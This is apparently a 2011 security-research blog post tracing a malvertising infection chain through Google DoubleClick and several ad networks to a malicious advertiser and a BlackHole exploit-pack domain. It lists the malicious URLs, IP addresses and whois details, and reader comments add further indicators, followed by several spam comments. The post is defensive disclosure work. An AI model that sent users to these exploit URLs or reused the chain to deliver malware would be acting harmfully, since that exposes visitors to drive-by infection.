Malvertising on Google Doubleclick ongoing

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)

In the past few days, our scanners noticed malvertising on Google DoubleClick. The malvertisement is being provided to DoubleClick by Adify (Now a part of Cox Digital Solutions), and to Adify by Pulpo Media, and to Pulpo Media by the malicious attackers pretending to be advertisers: indistic.com. The malvertisement causes visitor browsers to load exploits from kokojamba.cz.cc (the exploit domain), which is running the BlackHole exploit pack. Currently, 7 out of 44 vendors on VirusTotal can detect this malware.

This is our report. We plan to put up the video later--we still need to narrate it, which will take some time. As DoubleClick is a very large AD network, we decided to put up the post quickly.

The first link in the infection chain is the following standard script for all websites using Google DoubleClick for Publishers (Google DFP):

(Link 1:)
<script type='text/javascript' src='hxxp://partner.googleadservices.com/gampad/google_service.js'>

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 2:)
http://partner.googleadservices.com/gampad/google_ads.js

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 3:)
http://pubads.g.doubleclick.net/gampad/ads?correlator=1314244145446&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1199834677431615&slotname=LA_PRENSA_Poderes_728x90_Superior&page_slots=LA_PRENSA_Poderes_728x90_Superior&cookie=ID%3D6ece38c99f627779%3AT%3D1314244080%3AS%3DALNI_MbRwmcAoAFohCjkKxnj_JXcxZEUEA&url=http%3A%2F%2Fwww.laprensa.com.ni%2F2011%2F08%2F23%2Fpoderes&lmt=1314244147&dt=1314244147962&cc=100&oe=utf-8&biw=878&bih=477&ifi=1&adk=2910702588&u_tz=480&u_his=2&u_java=true&u_h=1920&u_w=1080&u_ah=1892&u_aw=1080&u_cd=32&flash=10.1.102.64&gads=v2&ga_vid=2122880267.1314244061&ga_sid=1314244061&ga_hid=187578555&ga_fc=true

Which generates a <script src> tag, causing the browser to load javascript from Adify (Now a part of Cox Digital Solutions):

(Link 4:)
http://ad.afy11.net/srad.js?azId=1000004110207

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 5:)
http://ad.afy11.net/ad?asId=1000004110207&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=55943306&rk1=56285031&rk2=1314244149.806&pt=0&asc=3x133&vad=878x477

Which generates an iframe, causing the browser to load javascript from tentaculos.net, which is a part of Pulpo Media:

(Link 6:)
http://d1.tentaculos.net/afr.php?zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE

Which gives an HTTP 302 redirect to:

(Link 7:)
http://d1.tentaculos.net/afr.php?ct=1&zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 8:)
http://indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=142038917

This is the malicious advertiser. The above javascript generates an iframe, causing the browser to load from the exploit domain kokojamba.cz.cc (Link 9-a), and also the creative (the banner ad) itself (Link 9-b) as a .png file. Here's a snippet of this javascript:


The entire javascript code can be found here.

The domain "indistic.com" was registered on Aug 12, 2011 (evidence 1) by "Marcene D. Rohodes (marcenedrhodessm@yahoo.com). The domain currently runs on IP 95.64.46.84 (AS49734) (thank you Jason D.Seimesi), which is located in Romania. The whois records show a US street address but with a Lithuania phone number and a Romanian IP (evidence 2):

=====================================
Administrative Contact:
Name: Marcene D. Rhodes
Organization: no
Address: 4653 Twin House Lane
City: Mount Vernon
Province/state: MO
Country: US
Postal Code: 65712
Phone: +370.956734778
Fax: +370.956734778
=====================================

The domain is using FreeDNS on freedns.afraid.org (evidence 3).

So there were at least three evidences here, that indistic.com wasn't a legitimate advertiser. This malvertisement shouldn't have been let into this chain of AD networks.

Furthermore, as (Jason D.Seimesi pointed out, the same IP is also used by pisofta.com--another domain also registered on Aug 12. Therefore there should be more than one malicious advertiser identify associated with this effort.

(Link 9-a, BlackHole exploit pack:)
http://kokojamba.cz.cc/index.php?tp=2733de342143bbc7

kokojamba.cz.cc is the exploit domain running the BlackHole exploit pack. It is currently running on IP 178.238.36.64, located in Jihomoravsk√Ĺ kraj of Czech Republic.

(Link 9-b:)
http://indistic.com/crt/1Npstr/728.PNG

Currently, 7 out of 44 vendors on VirusTotal can detect this malware:

We are in the process of informing all parties involved. If you know more about this incident, please email us at wayne@armorize.com

12 comments:

Jason D.Seimesi said...

Here's some other URLs to mull over:
indistic.com/counterjs.php?id=111818918
indistic.com/counterjs.php?id=111957518
indistic.com/counterjs.php?id=142038917
indistic.com/crt/1Npstr/160.PNG
indistic.com/crt/1Npstr/300.PNG
indistic.com/crt/1Npstr/728.PNG
indistic.com/crt/Depositphotos/deposit_300x250_v2.jpg
indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=111818918
indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=111957518
indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=132528216
indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=142038917
pisofta.com/crt/Depositphotos/deposit_300x250_v2.jpg
pisofta.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=84230724

Jason D.Seimesi said...

Incidently, I'm seeing 95.64.46.84 as the IP for both indistic.com and pisofta.com.

Wayne Huang said...

Thanks Jason, will look into it.

Wayne Huang said...

Thank you Jason, updated blog post and credit you. Search for your name to see updates.

Jason D.Seimesi said...

I haven't seen the kokojamba.cz.cc (178.238.36.64) come up, but I bet you that they've moved the exploit pack to 188.229.89.240.

Wayne Huang said...

Interesting, how do you know?

Anonymous said...

178.238.36.64 is just the DNS server.

ns2.cz.cc [178.238.36.64]
ns1.cz.cc [178.238.36.6]

kokojamba.cz.cc is on the ip 188.229.89.240

Enth said...

178.238.36.64 is just one of the DNS servers.

188.229.89.240 is the kokojamba.oz.cz domains ip.

Cheap Purses said...

I keep reading all
the post on this one.After reading I really feel great cause I really gain
new interesting post I really agree of the comments from it such a
fantastic,mind blowing job you have.Just keep posting new update I will also
keep updating on this one!

Joomla Development said...

I
am really inspired together with your writing abilities as smartly as
with the structure for your weblog. Keep up the excellent quality
writing, it's uncommon to see a nice blog like this one nowadays.

custommadeplayingcards said...

The content is amazing .i really liked the blog.........custom made playing cards

RUSH PCB said...


I
wonder how you got so good. This is really a fascinating blog, lots of
stuff that I can get into. One thing I just want to say is that your
Blog is so perfect!!!!

 

Post a Comment